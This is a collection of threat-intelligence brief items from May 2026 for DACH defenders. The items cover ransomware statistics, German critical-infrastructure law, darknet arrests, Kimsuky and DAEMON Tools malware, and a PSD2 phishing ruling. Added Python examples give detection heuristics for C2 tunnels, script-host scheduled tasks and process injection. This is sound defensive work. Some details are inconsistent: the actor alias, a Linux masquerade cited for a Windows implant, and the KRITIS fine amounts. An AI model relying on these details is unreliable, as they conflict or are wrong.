BKA arrested Dream Market lead administrator "Speedstepper" in Germany; OPSEC failure traced to cryptocurrency-to-physical-gold conversion patterns (daily 2026-05-16). Complements the W20 BKA Crimenetwork takedown (daily 2026-05-12) — two consecutive German federal LE actions against darknet-market administrative-tier operators in the same week. For European cybercrime ecosystem analysis: the BKA tempo on darknet-administrator pursuit is materially elevated through Q2 2026 and likely informs the broader operator OPSEC environment.

Check Point April 2026 ransomware analysis — Qilin leads at 15%, Germany at 5% of global victims

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17 · view item permalink →

Check Point's April 2026 monthly threat report (published early May 2026) confirms Qilin / Agenda leading all ransomware operators with 15% of 707 published attacks in April; Germany is the third-most-targeted country globally at 5.0% of victims (US 41.6%); Europe accounts for 27% of ransomware victims globally. Sector targeting in April 2026: Business Services (33.8%), healthcare, manufacturing. The Gentlemen — despite the May 4 backend breach — remained in the top-7 operators with 320+ victims (Check Point Research, 2026-05-08). The synthesis the dailies did not yet absorb: Germany's 5% share of global ransomware victims is materially elevated compared to the 2024–2025 baseline (~2–3%); the Qilin DLS lists 65 German victims total as of 2026-05-16 (Check Point blog, dataset reference). For Swiss defenders: CH-DE cross-border operations (Swiss subsidiaries in DE, German subsidiaries of Swiss parents) inherit the German exposure level; this is the empirical basis for a DACH-region threat-modelling premium on ransomware-readiness exercises.

Qilin / Agenda RaaS — April 2026 lead at 15% of global ransomware activity, Germany 5% of global victims

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17 · view item permalink →

W19 long-running record (item:qilin-agenda-raas-die-linke-confirms-q2-2026-german-activity) tracked Qilin's continued German activity. W20 status: Check Point's April 2026 report confirms Qilin leads all RaaS operators at 15% of 707 published attacks in April; Germany's share at 5% of global ransomware victims is the elevated-DACH-exposure data point (Qilin DLS German-victim count cited by W1 horizon research as approximately 65 as of 2026-05-16 — uncorroborated leak-site enumeration that should be treated as a lower bound); Die Linke (German political party) confirmed Qilin compromise in March 2026 (W19 carry-over); no new Swiss-specific victim named in window (Check Point Research).

KRITIS-DachG — German registration deadline 17 July 2026 is now 61 days out

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17 · view item permalink →

The KRITIS-DachG (Kritis-Dachgesetz, Germany's critical-infrastructure umbrella act) entered into force; the initial registration deadline of 17 July 2026 is now 61 days away. Operators of critical facilities in scope — including public-administration entities operating infrastructure in the sectors of energy, transport, finance, IT/telecommunications, space-ground infrastructure, and public administration — must register with the Federal Office of Civil Protection and Disaster Assistance (BBK) via an electronic platform jointly operated with the BSI. Registration requires operator name, legal form, commercial register number, address including public IP ranges, sector / industry classification, and critical-facility contact details. Violations constitute an administrative offence punishable by fines up to EUR 500,000. Public-sector IT departments in Germany should verify whether their IT and OT infrastructure qualifies as a "critical facility" under the KRITIS-DachG sector thresholds, register before 17 July 2026 or within three months of later qualification, and identify which services they must report under the act's disruption-reporting obligations to BBK / BSI (24-hour initial notification, 72-hour detailed report). Swiss federal entities with German subsidiaries or cross-border infrastructure should verify German subsidiary obligations (Luther Lawfirm; A&O Shearman).

BKA — Dream Market lead administrator "Speedstepper" arrested in Germany

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17 · view item permalink →

Adds to the BKA Crimenetwork takedown (covered daily 2026-05-12 as a separate W20 LE action). Two consecutive German federal LE actions against darknet-administrator-tier operators within the same week — a notable tempo signal for the EU cybercrime LE ecosystem. The OPSEC failure (cryptocurrency-to-physical-gold conversion patterns over seven years) is forensically interesting but the policy-horizon implication is that BKA's investigative throughput on darknet-administrator pursuits is materially elevated through Q2 2026 (daily 2026-05-16).

Kaspersky GReAT documents Kimsuky's Rust-based HelloDoor and TryCloudflare-tunnel C2 added to the PebbleDash toolkit [SINGLE-SOURCE]

From CTI Daily Brief — 2026-05-17 · published 2026-05-17 · view item permalink →

Kaspersky's Global Research and Analysis Team published a deep technical disclosure on 2026-05-14 covering Kimsuky (Ruby Sleet / APT43) campaigns observed during late 2025 and Q1 2026, documenting six malware families the actor is currently rotating (Kaspersky Securelist, 2026-05-14). The headline novelty is HelloDoor, the first Rust-based variant in the PebbleDash family (a backdoor platform Kimsuky appropriated from Lazarus around 2021); secondary additions are httpMalice (HTTP-only loader), MemLoad (reflective DLL loader), httpTroy (C2 backdoor) and continued use of AppleSeed / HappyDoor. The most operationally significant capability change is that HelloDoor's C2 channel uses Cloudflare Quick Tunnels via TryCloudflare — short-lived *.trycloudflare.com hostnames issued ad-hoc, terminating attacker control infrastructure behind Cloudflare's CDN, eliminating fixed C2 IPs and making network-layer indicator blocking impractical. Kaspersky verbatim: "Kimsuky has continuously introduced new malware variants based on the PebbleDash platform, a tool historically leveraged by the Lazarus Group but appropriated by Kimsuky since at least 2021... including the use of VSCode Tunneling, Cloudflare Quick Tunnels, DWAgent, large language models (LLMs), and the Rust programming language." Reported targeting: South Korean government, defence and medical sectors as the primary set, with documented spillover hits in Germany — the closest geographic proximity to Swiss government targets in recent Kimsuky reporting. Detection guidance from Kaspersky (paraphrased to avoid IOC reproduction): monitor for JSE/SCR/PIF droppers carrying Base64-encoded payloads; flag scheduled tasks under generic browser-update names (e.g. ChromeCheck, EdgeCheck); inspect VSCode tunnel authentications via GitHub for unrecognised tunnel names; alert on Rust-compiled PE images loading from non-standard paths and on outbound *.trycloudflare.com connections that don't match a developer's legitimate tunnel-use profile. Technique class: T1071.001 Application-layer C2 via web protocol + T1090.002 External Proxy + T1053.005 Scheduled Task. [SINGLE-SOURCE] — only Kaspersky GReAT carries this depth; included because Kaspersky is HIGH-reliability for North Korea-nexus reporting and the technical detail is defender-actionable. Marked at edge of the 72 h developing window (Securelist publication 2026-05-14, ~62 h before run start).
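Two of the paraphrased heuristics above (generic browser-update task names backed by a script action, and *.trycloudflare.com egress outside a known developer tunnel profile), worked as an added example that is not Kaspersky's code or rules. The scheduled-task export, the egress records, the hostnames and the per-user tunnel allow-list are all constructed, and the record shapes are hypothetical rather than schtasks or proxy-log output.

```python
"""Added example: scheduled-task name heuristic and Quick Tunnel egress
baseline, over constructed telemetry (hypothetical record shapes)."""
import re

# Constructed scheduled-task export.
TASKS = [
    {"host": "WS-1", "name": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "action": r"%systemroot%\system32\usoclient.exe StartScan"},
    {"host": "WS-1", "name": r"\ChromeCheck",
     "action": r"C:\Users\Public\Libraries\chk.jse"},
    {"host": "WS-2", "name": r"\GoogleUpdateTaskMachineUA",
     "action": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler"},
    {"host": "WS-2", "name": r"\EdgeCheck",
     "action": r"wscript.exe //B C:\ProgramData\ec.vbs"},
]

# Constructed DNS/proxy egress records.
EGRESS = [
    {"host": "WS-1", "user": "u.mueller", "fqdn": "aaaa-bbbb-cccc.trycloudflare.com"},
    {"host": "DEV-7", "user": "dev.jane", "fqdn": "demo-portal-xyz.trycloudflare.com"},
    {"host": "WS-2", "user": "u.mueller", "fqdn": "update.googleapis.com"},
]

# Hypothetical developer tunnel profile: users expected to use Quick Tunnels.
DEV_TUNNEL_PROFILE = {"dev.jane"}

# A bare vendor/browser word plus Update/Check, and nothing else, is the
# "generic update name" pattern; real vendor tasks carry longer names.
GENERIC_UPDATE_NAME = re.compile(
    r'^(?:chrome|edge|firefox|browser|google|microsoft)?(?:update|updater|check)$', re.I)
SCRIPT_ACTION = re.compile(r'\.(?:jse?|vbs|vbe|wsf|scr|pif)\b|\b(?:w|c)script\.exe', re.I)

def suspicious_tasks(tasks):
    """Tasks whose leaf name is a generic update name and whose action runs a
    script or script host rather than a vendor updater binary."""
    hits = []
    for t in tasks:
        leaf = t["name"].rsplit("\\", 1)[-1]
        if GENERIC_UPDATE_NAME.match(leaf) and SCRIPT_ACTION.search(t["action"]):
            hits.append((t["host"], leaf))
    return hits

def unexpected_tunnels(egress, profile):
    """Quick Tunnel hostnames contacted by users outside the tunnel profile."""
    return [(r["host"], r["user"], r["fqdn"]) for r in egress
            if r["fqdn"].lower().endswith(".trycloudflare.com")
            and r["user"] not in profile]

if __name__ == "__main__":
    print(suspicious_tasks(TASKS))
    print(unexpected_tunnels(EGRESS, DEV_TUNNEL_PROFILE))
```

The tunnel check is a baseline comparison, not an indicator match, which is the point of the guidance: the hostnames are ephemeral, so the durable signal is who in the estate has a legitimate reason to be using Quick Tunnels at all.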

BKA arrests Dream Market lead administrator "Speedstepper" in Germany — cryptocurrency-to-physical-gold OPSEC failure after seven years at large

From CTI Daily Brief — 2026-05-16 · published 2026-05-16 · view item permalink →

Owe Martin Andresen, a 49-year-old German national alleged by US and German prosecutors to be "Speedstepper" — the lead administrator of the Dream Market darknet narcotics marketplace from 2013 until its 2019 voluntary shutdown — was arrested in Germany on 2026-05-07 and publicly identified on 2026-05-13–14 (The Record, 2026-05-14 · US DEA, 2026-05-13). The action was a coordinated multi-agency operation: the Bundeskriminalamt and the Zentrale Kriminalinspektion Oldenburg for the German side, with the US DEA Miami, IRS-CI Cyber Crimes Unit, FBI, USPIS, and HSI executing in parallel. A US federal grand jury in the Northern District of Georgia had returned a sealed indictment on 2026-01-13 charging Andresen with six counts of international concealment money laundering and six counts of concealment money laundering (240 years aggregate maximum); German charges carry up to five years. The OPSEC failures that closed the seven-year gap were operational, not technical: in late 2022 Andresen allegedly accessed Dream Market's dormant cryptocurrency wallets — an action only the holder of the original private keys could perform — and consolidated the contents into a single wallet, providing prosecutors with a definitive on-chain link; and in August 2023 he used an Atlanta-based cryptocurrency-to-physical-asset service to purchase gold bars that were shipped directly to his home address in Germany, providing the geographic and identity link. At arrest, German authorities seized approximately USD 1.7 million in gold bars, USD 23,000 in cash, and approximately USD 1.2 million in cryptocurrency. Three Dream Market co-administrators ("Oxymonster", "KITT3N", "GOWRON") had been convicted previously. 
The case is operationally interesting to public-sector intelligence liaisons because it illustrates that long-tail attribution of darknet operators is increasingly driven by post-cessation financial behaviour — wallet reactivation, regulated-service touchpoints, physical-asset conversion — rather than on-platform OPSEC; the seven-year delay between the marketplace's closure and the arrest is the operational signal.

BKA and ZIT dismantle relaunched Crimenetwork darknet marketplace; German operator arrested in Mallorca on European Arrest Warrant

From CTI Daily Brief — 2026-05-12 · published 2026-05-12 · view item permalink →

The German Bundeskriminalamt (BKA) and Frankfurt's Central Office for Combating Internet Crime (ZIT), with Spanish National Police support, arrested a 35-year-old German national at his residence in Mallorca on a European Arrest Warrant on 2026-05-08 and shut down the relaunched Crimenetwork (Bundeskriminalamt press release — Deutscher Betreiber von "Crimenetwork" auf Mallorca verhaftet, 2026-05-08; Help Net Security, 2026-05-11). Crimenetwork was the dominant German-language darknet marketplace; the platform was originally taken down in December 2024, and a new operator rebuilt the infrastructure under the same branding shortly afterwards. The rebooted platform reached ~22,000 users and 100+ vendors and brokered stolen data, narcotics, forged documents and illegal services in BTC / LTC / XMR for an estimated €3.6 million in commissions and vendor fees before being seized. Investigators recovered approximately €194,000 in assets and substantial user/transaction data, which the BKA states will drive a wave of follow-on prosecutions — the press release explicitly frames the seized infrastructure data as the operational value, not the headline arrest.

Defender takeaway: The DACH-region credential / payment-card / forged-document inventory cycle on Crimenetwork is now a known-historical artefact for the next 12–24 months — the seized vendor and buyer ledgers will resurface in attribution reports and breach-notification timelines. For Swiss / German / Austrian SOCs running credential-monitoring services, expect a downstream wave of leaked-credential validations once the BKA dataset reaches partner CERTs. The case also reinforces a structural point for German-speaking-market threat models: when an EU-wide darknet platform is dismantled, the replacement is typically a same-branding relaunch on residual customer trust rather than a forum migration — the rebrand interval has now compressed to weeks.

Audit SIEM/XDR telemetry coverage as a percentage of host inventory; the South Staffordshire 5%-coverage finding is the operational lesson

From CTI Daily Brief — 2026-05-12 · published 2026-05-12 · view item permalink →

For any NIS2 / KRITIS-DachG / CER essential-entity SOC: measure SIEM / XDR coverage by hostname inventory rather than by sensor-licence count. The South Staffordshire 5% finding is what the ICO judged as inadequate for a water OES; with NIS2 transposition in force across the EU and KRITIS-DachG live in Germany, regulators are now armed with a concrete UK precedent for what "proportionate technical measures" failure looks like in court. Practical first step: pull a list of every Active Directory–joined host from AD; cross-reference against the EDR / SIEM source list; flag the delta. The delta is what the ICO would call the gap.
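The first step above (AD host list against the SIEM / EDR source list, flag the delta), worked as an added example that is not the ICO's, South Staffordshire's or any vendor's method. Both inventories are constructed; in practice the AD side would come from an AD computer-object export and the sensor side from the SIEM or EDR console. The point the arithmetic alone does not show is normalisation: FQDNs, short names, case and the trailing `$` of computer accounts all have to collapse to one key, or the "gap" is mostly naming noise.

```python
"""Added example: SIEM/XDR coverage as a percentage of the AD host inventory,
with hostname normalisation, over constructed inventories."""

def normalize_host(name):
    """Collapse 'WS01.corp.example', 'ws01' and 'WS01$' to the same key."""
    n = name.strip().lower().rstrip("$")
    return n.split(".")[0]

def coverage_report(ad_hosts, sensor_hosts):
    """Coverage percentage plus the two deltas a regulator would ask about:
    AD hosts with no sensor, and sensors reporting for hosts AD does not know."""
    ad = {normalize_host(h) for h in ad_hosts if h.strip()}
    seen = {normalize_host(h) for h in sensor_hosts if h.strip()}
    missing = sorted(ad - seen)
    orphans = sorted(seen - ad)      # stale, unmanaged or renamed systems
    covered = len(ad) - len(missing)
    pct = round(100 * covered / len(ad), 1) if ad else 0.0
    return {"inventory": len(ad), "covered": covered, "coverage_pct": pct,
            "missing": missing, "orphans": orphans}

# Constructed inventories (not real exports).
AD_EXPORT = ["WS01.corp.example", "WS02.corp.example", "SRV-DC1.corp.example",
             "SRV-FILE1.corp.example", "OT-HMI-3.corp.example"]
SIEM_SOURCES = ["ws01", "srv-dc1", "SRV-FILE1$", "legacy-box"]

if __name__ == "__main__":
    print(coverage_report(AD_EXPORT, SIEM_SOURCES))
```

The orphan list is worth keeping in the report: a sensor name that AD does not recognise is either a host that left the domain without leaving the SIEM, or a naming mismatch that would otherwise inflate the apparent gap.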

Media and political (HU, DE)

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

Two European political / media targets in the week: Mediaworks Kft (Hungary) — World Leaks claimed 8.5 TB of exfiltrated data including payroll, contracts, and internal editorial communications; Mediaworks confirmed "a significant amount of illegally obtained data may have come into the possession of unauthorized persons"; no public regulator notification announcement at window close (The Record, 2026-05-04 · daily 2026-05-06). Die Linke (Germany) — German federal political party confirmed Qilin ransomware encryption and 1.5 TB exfiltration; state DPA notified; no public ransom figure (heise online — covered in daily, 2026-05-08). Two distinct operators (data-theft-only World Leaks versus encrypt-and-exfiltrate Qilin), shared targeting of politically significant European entities. The defender lesson: data-theft-only operators defeat backup-centric ransomware defences entirely — effective detection requires egress monitoring and data-loss-prevention tooling capable of alerting on large-volume exfiltration before the attacker goes public on a leak site.

DAEMON Tools Lite supply-chain compromise — China-nexus QUIC RAT delivered via signed installers; ~12 selective government / scientific / manufacturing targets

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

Official DAEMON Tools Lite Windows installers (versions 12.5.0.2421 → 12.5.0.2434) were trojanised on the Disc Soft vendor distribution server from 8 April to 5 May 2026, with malicious installers maintaining the authentic AVB Disc Soft code-signing certificate. The campaign deployed three stages: a .NET information collector (envchk.exe) for host fingerprinting deployed broadly across more than 100 countries (Germany, France, Spain, and Italy appear explicitly in first-stage victim telemetry); a shellcode-based backdoor; and QUIC RAT — a C++ implant supporting HTTP / UDP / TCP / WebSocket / QUIC / HTTP/3 C2 channels — selectively deployed to approximately twelve targets in government, scientific, manufacturing, and retail sectors in Russia, Belarus, and Thailand per Kaspersky. Chinese-language strings in the information collector suggest a Chinese-speaking actor; no formal attribution to a named group. The C2 domain was registered 2026-03-27 — approximately two weeks before the first trojanised installer (2026-04-08) — confirming pre-planned operation. Disc Soft acknowledged 2026-05-05, released clean version 12.6.0.2445, resolved the distribution compromise within 12 hours (Kaspersky Securelist · The Record, 2026-05-06 · BleepingComputer, 2026-05-06 · Help Net Security, 2026-05-06 · daily 2026-05-07 and 2026-05-09 UPDATE). Defender takeaway: audit endpoints for DAEMON Tools Lite versions 12.5.0.2421 – 12.5.0.2434 installed on any government, scientific, or manufacturing endpoint since 8 April 2026; hunt for envchk.exe, unsigned processes injected into notepad.exe or conhost.exe, and outbound UDP 443 (QUIC) to non-sanctioned destinations; Sysmon EID 1 with parent-image filters surfaces post-injection activity. The pattern — selective QUIC-channel deployment behind broad-targeting reconnaissance staging — is the operationally important detail; it explains why telemetry hit-rate alone underestimates targeted-actor presence.

German LG Berlin II ruling — Apobank liable for €218,000+ phishing loss; PSD2 IP-analytics obligation clarified

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

On 2026-04-22 the Landgericht Berlin II (Civil Chamber 38, case 38 O 293/25; not yet final pending appeal) ordered Deutsche Apotheker- und Ärztebank (Apobank) to reimburse €218,000+ in losses from a sophisticated phishing attack combining forged physical bank letters, manipulated online banking interfaces, and spoofed-number phone calls. The court rejected gross-negligence defences, finding the fraud too sophisticated to attribute to customer failure; critically, the ruling found the bank's fraud-detection systems failed to act on a clear anomaly visible in bank-side logs — the new device registration and first login originated from materially different IP addresses and ISPs. The court treated this as an obligation under Germany's PSD2 implementation: an IP-based behavioural analytics duty triggering a strong-customer-authentication challenge when registration and first-use IPs diverge (heise online, 2026-05-08 · ilex Rechtsanwälte case summary · daily 2026-05-09). Defender takeaway: EU and Swiss financial-sector and public-sector digital-service providers should expect this trend of liability lines moving toward the service provider when fraud signals are present in server-side telemetry but not acted on. The defensive engineering implication is concrete: register-new-device and first-login IP / ISP comparison is now a regulatory expectation in PSD2 jurisdictions, not just a best-practice control.

Google Threat Intelligence Group — Europe data-leak landscape 2025

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

GTIG's Europe data-leak landscape analysis (published 2026-04-15, first covered 2026-05-07) is the second-tier annual reference that materially affects DACH defender posture and merits cross-week synthesis: Germany is the primary European ransomware target with SAFEPAY accounting for 25% of German data-leak-site posts (76 victims claimed in 2025), Qilin tripling operational tempo in Germany during Q3 2025 with 13 additional German victims posted by early 2026 (Die Linke this week confirms continued activity into 2026-W19), and Sarcoma actively recruiting German network access via criminal forums since November 2024. 96% of German ransomware victims are organisations with fewer than 5,000 employees — exploited both directly and as supply-chain footholds into larger enterprises and government contractors; legal and professional services rose to 14% of victims — explicitly relevant to Swiss / EU public-sector procurement officers since those firms hold client IP and M&A intelligence. GTIG attributes part of the shift to AI-enabled high-quality localisation eroding the language-barrier protection that historically benefited non-English-speaking markets (daily 2026-05-07).

Qilin / Agenda RaaS — Die Linke confirms Q2 2026 German activity continuity

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

Current state: GTIG's Europe data-leak landscape (§ 6) documented Qilin tripling Q3 2025 operational tempo in Germany; Die Linke (Germany federal political party) confirmed Qilin encryption with 1.5 TB exfiltrated (covered 2026-05-08), state DPA notified — Qilin German activity continues into 2026-Q2. No public-claim shift or victim-list expansion beyond Die Linke this week. Outstanding question: whether Qilin's targeting of political and civil-society organisations expands into other 2026 EU election cycles.

German LG Berlin II — Apobank ruling sets PSD2 IP-analytics obligation as case law

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

The Apobank phishing-liability ruling (LG Berlin II, case 38 O 293/25, 2026-04-22; not yet final pending appeal) explicitly places liability on the bank for failing to act on IP / ISP divergence between new-device registration and first login — interpreted under Germany's PSD2 implementation as an obligation to deploy IP-based behavioural analytics and trigger strong-customer-authentication challenges when registration and first-use IPs diverge (heise online, 2026-05-08 · daily 2026-05-09). What changed: even if not yet final on appeal, the ruling is the most explicit case-law statement to date in a PSD2 jurisdiction that failure to act on a fraud signal present in bank-side telemetry shifts liability to the service provider. What defenders need to do differently: EU and Swiss financial-sector and public-sector digital-service providers should treat register-new-device and first-login IP / ISP comparison as a regulatory expectation rather than best practice — and should specifically ensure the SCA-step-up signal can be raised in real time on this anomaly. Anticipate other EU member-state PSD2 jurisdictions following the LG Berlin II reasoning.
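The register-new-device versus first-login IP / ISP comparison described in both Apobank items above, worked as an added example that is not the court's, Apobank's or heise's material. The prefix-to-ASN table is a constructed in-memory stand-in for a real IP-to-ASN lookup, the event shape is hypothetical, and the policy (any IP divergence raises the SCA step-up; an ISP/ASN change or an unresolvable address raises it at high severity) is one reading of the ruling, not its text.

```python
"""Added example: SCA step-up decision on IP / ISP divergence between a
new-device registration and the first login on that device."""
import ipaddress
from dataclasses import dataclass

# Constructed prefix -> (ASN, ISP) table; not real routing data.
ASN_TABLE = [
    ("203.0.113.0/24", (64500, "ISP-A")),
    ("198.51.100.0/24", (64501, "ISP-B")),
    ("192.0.2.0/24", (64500, "ISP-A")),
]

def lookup_asn(ip):
    addr = ipaddress.ip_address(ip)
    for prefix, info in ASN_TABLE:
        if addr in ipaddress.ip_network(prefix):
            return info
    return (None, "unknown")

@dataclass
class AuthEvent:
    customer_id: str
    device_id: str
    ip: str

def decide_step_up(registration: AuthEvent, first_login: AuthEvent):
    """Compare the two events for one customer/device pair and return whether a
    strong-customer-authentication challenge must be raised, with reasons."""
    if (registration.customer_id, registration.device_id) != (first_login.customer_id, first_login.device_id):
        raise ValueError("events do not belong to the same customer/device pair")
    reg_asn, reg_isp = lookup_asn(registration.ip)
    login_asn, login_isp = lookup_asn(first_login.ip)
    reasons = []
    if registration.ip != first_login.ip:
        reasons.append("ip-divergence")
    # Different network, or an address we cannot attribute at all: fail closed.
    if reg_asn != login_asn or None in (reg_asn, login_asn):
        reasons.append("isp-divergence")
    if not reasons:
        severity = "none"
    elif "isp-divergence" in reasons:
        severity = "high"
    else:
        severity = "medium"      # same ISP, new address (e.g. DHCP churn)
    return {"require_sca": bool(reasons), "severity": severity, "reasons": reasons,
            "registration_isp": reg_isp, "login_isp": login_isp}

if __name__ == "__main__":
    reg = AuthEvent("c1", "d1", "203.0.113.10")
    print(decide_step_up(reg, AuthEvent("c1", "d1", "198.51.100.7")))
```

The decision has to be available synchronously on the first-login path, which is the engineering consequence of the ruling: an after-the-fact fraud report that surfaces the divergence a day later is exactly the bank-side-telemetry-not-acted-on pattern the court penalised.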

Germany KRITIS-DachG in force — public administration first time in critical-infrastructure scope; registration deadline 17 July 2026

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

Germany's KRITIS-DachG (Act to Strengthen Physical Resilience of Critical Installations), implementing EU CER Directive 2022/2557, entered into force in late March 2026 following Bundesrat approval on 6 March 2026 (Luther Lawfirm, 2026-04-10 · Morrison Foerster European Digital Compliance, 2026-05-01). The Act establishes the first cross-sectoral physical and organisational resilience framework covering energy, transport, healthcare, water, finance, and — for the first time — municipal waste disposal and aspects of public administration. Registration deadline 17 July 2026 (or within three months of later qualification). Post-registration obligations cascade over nine–ten months: risk assessments every four years covering natural / technical / sabotage / cross-border scenarios, resilience plans, and 24-hour incident reporting to a joint BSI/BBK reporting point. Fines for non-compliance: up to €100,000 for registration/cooperation failures; up to €1,000,000 for concealing non-registration status; up to €200,000 for missing resilience evidence or plan. Key ambiguity: the BMI implementing ordinance defining which specific services and installations qualify as "critical" is not yet published, leaving scope uncertain for borderline operators. What defenders need to do differently: German public-sector and critical-sector organisations need to self-assess KRITIS-DachG applicability before 17 July; ISG-style 24-hour reporting obligation now applies to physical as well as cyber incidents; Swiss entities with German subsidiaries operating in scope sectors are directly affected. Cross-references NIS2 and BSI Act obligations — the three frameworks overlap operationally and require coordinated incident-response runbook design.

EDPB Coordinated Enforcement Framework 2026 — 25 DPAs target GDPR transparency obligations (Articles 12–14)

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11 · view item permalink →

On 19 March 2026 the European Data Protection Board launched its annual Coordinated Enforcement Framework (CEF) action, with 25 participating DPAs across Europe examining compliance with GDPR Articles 12, 13, and 14 — the transparency and information obligations requiring controllers to clearly disclose what data is processed, on what legal basis, and for what purposes. Unlike prior CEF years (right of access 2024, right to erasure 2025), transparency obligations are broadly applicable to every data-processing controller in every sector, making this year's sweep unusually wide (EDPB, 2026-03-19). Participating DPAs include Austria, Denmark, Germany (Brandenburg, Niedersachsen), Finland, France, Greece, Spain, Italy, Malta, Slovenia, Slovakia. Each DPA may conduct either formal enforcement actions or lighter-touch fact-finding exercises; findings consolidated into an aggregated EDPB report in H2 2026. What defenders need to do differently: audit privacy notices — website cookie banners, HR processing notices, CCTV notices, AI-generated data notices — against the Articles 12–14 checklist; given the EU's 2026 AI Act obligations also arriving in August, transparency failures in AI-generated personal-data processing are likely to attract enforcement attention. CEF findings frequently trigger follow-on national investigations at DPAs that identify outliers. Single-source national-CERT carve-out applies (EDPB is the primary disclosing authority for its own programme).

DAEMON Tools Lite supply chain — QUIC RAT deployed via signed installer; EU governments among targeted victims

From CTI Daily Brief — 2026-05-09 · published 2026-05-09 · view item permalink →

Since 8 April 2026, trojanised versions of DAEMON Tools Lite (12.5.0.2421 through 12.5.0.2434) have been distributed from the legitimate vendor website, signed with valid AVB Disc Soft digital certificates. Kaspersky researchers documented a three-stage architecture: an initial profiling component (envchk.exe) fingerprinting the system; a minimalistic backdoor enabling remote command execution on selected targets; and QUIC RAT, an advanced implant that injects into notepad.exe and conhost.exe, supports C2 over QUIC (evading proxy inspection), and implements shell execution, file management, process injection, keylogging, SOCKS proxy, and TCP tunnelling (Kaspersky Securelist, 2026-05-05 updated 2026-05-08 · Help Net Security, 2026-05-06). Several thousand installation attempts were observed across ~100 countries; Germany, France, Spain, and Italy are among the top victim countries. Targeted QUIC RAT deployment was limited to approximately a dozen machines in government, scientific, manufacturing, and retail sectors — indicating selective activation consistent with intelligence-collection objectives. Artefacts including Chinese-language strings suggest a Chinese-speaking actor; no formal attribution has been made. The clean release is version 12.6.0.2445 (released 2026-05-06).

MITRE ATT&CK coverage: T1195.002 Supply Chain Compromise; T1036.004 Masquerade Task or Service (kworker/ksoftirqd masquerade); T1573.002 Asymmetric Cryptography / QUIC; T1055 Process Injection.

Defender takeaway: Audit endpoints for DAEMON Tools Lite versions 12.5.0.2421–12.5.0.2434; check for envchk.exe, unsigned processes injected into notepad.exe or conhost.exe, and outbound QUIC (UDP 443) to non-sanctioned destinations. Sysmon EID 1 with parent-process image path filters for notepad.exe or conhost.exe spawning child processes will surface post-injection activity. Update to 12.6.0.2445.
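The two checks in the takeaway above (version-range audit and post-injection parent/child filtering) as an added Python example; this is not code from ctipilot.ch or from Kaspersky. The Sysmon Event ID 1 records are constructed dictionaries standing in for already-parsed events, the field names follow Sysmon's EventData (Image, ParentImage, ProcessId, UtcTime), and the allow-list of benign notepad.exe children is an assumption to be tuned per environment.

```python
"""Added detection example (not from the brief or Kaspersky): flags DAEMON Tools
Lite versions in the trojanised range and Sysmon EID 1 records where notepad.exe
or conhost.exe is the parent of a new process (post-injection activity)."""
from typing import Dict, Iterable, List, Set, Tuple

# Trojanised DAEMON Tools Lite versions named in the brief (inclusive range).
AFFECTED_MIN = (12, 5, 0, 2421)
AFFECTED_MAX = (12, 5, 0, 2434)

# Processes QUIC RAT injects into, per the brief; matching is case-insensitive.
INJECTION_HOSTS: Set[str] = {"notepad.exe", "conhost.exe"}


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '12.5.0.2430' into (12, 5, 0, 2430) so ranges compare numerically."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected_version(version: str) -> bool:
    """True when an installed version falls inside the trojanised range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def basename(image_path: str) -> str:
    """Lower-cased file name of a Windows image path ('C:\\Windows\\notepad.exe')."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_injection_children(events: Iterable[Dict],
                            allowlist: Set[str] = frozenset()) -> List[Tuple[int, str, str]]:
    """Return (ProcessId, child image, parent image) for every EID 1 record whose
    parent is one of the injection hosts. `allowlist` (assumed, per-environment)
    names child images that notepad.exe/conhost.exe legitimately spawn and that
    should be suppressed; everything else is surfaced for triage."""
    hits: List[Tuple[int, str, str]] = []
    for event in events:
        if event.get("EventID") != 1:
            continue  # only process-creation records carry a parent image
        parent = basename(event.get("ParentImage", ""))
        if parent not in INJECTION_HOSTS:
            continue
        child = basename(event.get("Image", ""))
        if child in allowlist:
            continue
        hits.append((int(event["ProcessId"]), child, parent))
    return hits


# Constructed sample telemetry: one benign record and two post-injection shells.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2026-05-08 09:12:01", "ProcessId": 4120,
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"EventID": 1, "UtcTime": "2026-05-08 09:12:44", "ProcessId": 4388,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\notepad.exe"},
    {"EventID": 3, "UtcTime": "2026-05-08 09:12:45", "ProcessId": 4388,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\notepad.exe"},
    {"EventID": 1, "UtcTime": "2026-05-08 09:13:02", "ProcessId": 4402,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\conhost.exe"},
]

if __name__ == "__main__":
    for pid, child, parent in flag_injection_children(SAMPLE_EVENTS):
        print(f"suspicious: pid={pid} {parent} -> {child}")
    for v in ("12.5.0.2430", "12.6.0.2445"):
        print(v, "affected" if is_affected_version(v) else "clean")
```

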